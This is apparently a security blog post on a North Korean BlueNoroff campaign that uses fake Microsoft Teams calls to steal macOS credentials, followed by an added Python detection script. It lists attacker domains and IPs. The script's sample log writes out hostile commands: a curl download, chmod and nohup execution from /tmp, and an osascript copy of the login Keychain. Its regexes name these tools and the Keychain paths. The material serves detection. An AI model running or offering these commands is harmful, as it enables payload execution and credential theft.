North Korea’s “Prospect Call” Trap: Lazarus Turns Teams Meetings into macOS Credential Theft
2026-01-29 • Daylight
https://daylight.ai/blog/prospect-call-microsoft-teams-meetings
Daylight Security investigated a macOS intrusion attributed in the source to BlueNoroff, a financially motivated subgroup of North Korea’s Lazarus Group, and aligned it with the GhostCall campaign pattern. The attacker began with a Telegram business-prospect pretext, moved the victim to a Microsoft Teams call on a lookalike domain, and used audio-troubleshooting instructions to make the victim run terminal commands. The observed chain used native macOS tools including curl, chmod, codesign, nohup, and osascript to download and execute binaries from cache and temporary paths, stage data, and copy the user’s Keychain database. Infrastructure included teams.microscall[.]com, microsmeet[.]xyz, bluyy[.]com, supportzm[.]com, and Hostwinds IP addresses, showing how live social engineering can turn routine business workflows into credential-theft operations.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | teams.microscall.com | 2026-01-29 | 2026-03-11 |
| DOMAIN | supportzm.com | 2026-01-29 | 2026-03-02 |
| HASH | b302be4f9c515eb68d3e8b1ad8388d4… | 2026-01-29 | 2026-01-29 |
| HASH | ede7f3ece611ba6c1ac4a02cf6a618b… | 2026-01-29 | 2026-01-29 |
| HASH | e3ed631addd7242e8c1f6faa9008774… | 2026-01-29 | 2026-01-29 |
| HASH | de664ae9a35ec7f156962df168d876c… | 2026-01-29 | 2026-01-29 |
| HASH | 18ec3c93e076e16447aee6fa390a44d… | 2026-01-29 | 2026-01-29 |
| HASH | 75a82b9a2e7cfa0002fbbd1dbcb0bfa… | 2026-01-29 | 2026-01-29 |
| URL | https://microsmeet.xyz/ | 2026-01-29 | 2026-01-29 |
| DOMAIN | microsmeet.xyz | 2026-01-29 | 2026-01-29 |
| DOMAIN | bluyy.com | 2026-01-29 | 2026-01-29 |
| IPv4 | 23.254.130.131 | 2026-01-29 | 2026-01-29 |
| IPv4 | 23.254.204.184 | 2025-06-20 | 2026-01-29 |
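The summary describes a living-off-the-land chain (curl, chmod, codesign, nohup, osascript; binaries run from cache and temporary paths; the login Keychain database copied out), and the table above supplies the network indicators. The following script is an added detection example written for this page; it is not Daylight's code or tooling. It takes the domains and IPs from the table (the hashes are truncated on the page, so they are not used), applies behavioural heuristics for the described chain, and runs both over a small constructed log in an assumed two-record format (`DNS` and `EXEC` lines, a format invented here, not a real sensor's). A command line is alerted on only when a native tool appears together with staging-path or Keychain context, or when an indicator from the table is hit, so routine `curl` and `chmod` use does not fire.

```python
import re

# Network indicators copied from the page's IoC table. The hashes on the page are
# truncated, so only domains and IPs are matched here.
IOC_DOMAINS = {"teams.microscall.com", "supportzm.com", "microsmeet.xyz", "bluyy.com"}
IOC_IPS = {"23.254.130.131", "23.254.204.184"}

# Behavioural heuristics for the chain in the summary: native macOS tools,
# execution/staging from temp or cache paths, and Keychain database access.
LOLBIN_RE = re.compile(r"\b(curl|chmod|codesign|nohup|osascript)\b")
STAGING_PATH_RE = re.compile(r"/(?:private/)?tmp/|/var/folders/|/Library/Caches/")
KEYCHAIN_RE = re.compile(r"Library/Keychains/|login\.keychain-db")
URL_HOST_RE = re.compile(r"https?://([^/\s'\"]+)")

# Constructed log format (an assumption for this example, not a real sensor format):
#   <ts> DNS user=<u> qname=<host> answer=<ip>
#   <ts> EXEC user=<u> cmd="<command line>"
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<kind>DNS|EXEC) user=(?P<user>\S+) (?P<rest>.*)$")
DNS_RE = re.compile(r"qname=(?P<qname>\S+) answer=(?P<answer>\S+)")
EXEC_RE = re.compile(r'cmd="(?P<cmd>.*)"\s*$')

# Constructed sample log: three lines modelled on the described chain, three benign.
SAMPLE_LOG = """\
2026-01-29T10:14:02Z DNS user=alice qname=teams.microscall.com answer=23.254.130.131
2026-01-29T10:14:40Z EXEC user=alice cmd="curl -sS -o /tmp/.audiofix https://microsmeet.xyz/fix && chmod +x /tmp/.audiofix && nohup /tmp/.audiofix >/dev/null 2>&1 &"
2026-01-29T10:15:03Z EXEC user=alice cmd="osascript -e 'do shell script "cp ~/Library/Keychains/login.keychain-db /tmp/.k"'"
2026-01-29T10:20:11Z EXEC user=bob cmd="curl -s https://api.github.com/repos/octocat/hello-world"
2026-01-29T10:21:00Z EXEC user=bob cmd="chmod +x ./build.sh"
2026-01-29T10:22:00Z DNS user=bob qname=teams.microsoft.com answer=203.0.113.5
"""


def ioc_domain_hit(host):
    """Return the matching IoC domain if host equals it or is a subdomain of it."""
    host = host.lower().rstrip(".")
    for d in sorted(IOC_DOMAINS):
        if host == d or host.endswith("." + d):
            return d
    return None


def command_reasons(cmd):
    """List the reasons a command line resembles the observed macOS chain."""
    reasons = []
    tools = sorted(set(LOLBIN_RE.findall(cmd)))
    if tools:
        reasons.append("lolbin:" + ",".join(tools))
    if STAGING_PATH_RE.search(cmd):
        reasons.append("staging-path")
    if KEYCHAIN_RE.search(cmd):
        reasons.append("keychain-access")
    for host in URL_HOST_RE.findall(cmd):  # match hosts inside URLs, not bare substrings
        hit = ioc_domain_hit(host)
        if hit:
            reasons.append("ioc-domain:" + hit)
    for ip in sorted(IOC_IPS):
        if ip in cmd:
            reasons.append("ioc-ip:" + ip)
    return reasons


def dns_reasons(qname, answer):
    """List IoC hits for a DNS query name and its resolved address."""
    reasons = []
    hit = ioc_domain_hit(qname)
    if hit:
        reasons.append("ioc-domain:" + hit)
    if answer in IOC_IPS:
        reasons.append("ioc-ip:" + answer)
    return reasons


def should_alert(reasons):
    """Alert on any IoC hit, or on a native tool combined with staging/Keychain context."""
    has_ioc = any(r.startswith("ioc-") for r in reasons)
    has_lolbin = any(r.startswith("lolbin:") for r in reasons)
    has_context = any(r in ("staging-path", "keychain-access") for r in reasons)
    return has_ioc or (has_lolbin and has_context)


def scan(log_text):
    """Parse the constructed log format and return alert records in input order."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        kind = m.group("kind")
        if kind == "DNS":
            d = DNS_RE.search(m.group("rest"))
            reasons = dns_reasons(d.group("qname"), d.group("answer")) if d else []
        else:
            e = EXEC_RE.search(m.group("rest"))
            reasons = command_reasons(e.group("cmd")) if e else []
        if should_alert(reasons):
            alerts.append({"ts": m.group("ts"), "user": m.group("user"),
                           "kind": kind, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a["ts"], a["user"], a["kind"], ", ".join(a["reasons"]))
```

On the sample log this flags the DNS lookup of the lookalike Teams domain (and its resolution to a listed Hostwinds address), the download-chmod-nohup chain staged under `/tmp`, and the `osascript` call that copies `login.keychain-db`, while leaving the GitHub `curl` and the `chmod +x ./build.sh` untouched. In a real deployment the `EXEC` records would come from EDR or unified-log process events, and the subdomain match matters because the page's indicator is `teams.microscall.com` under the registered `microscall.com`.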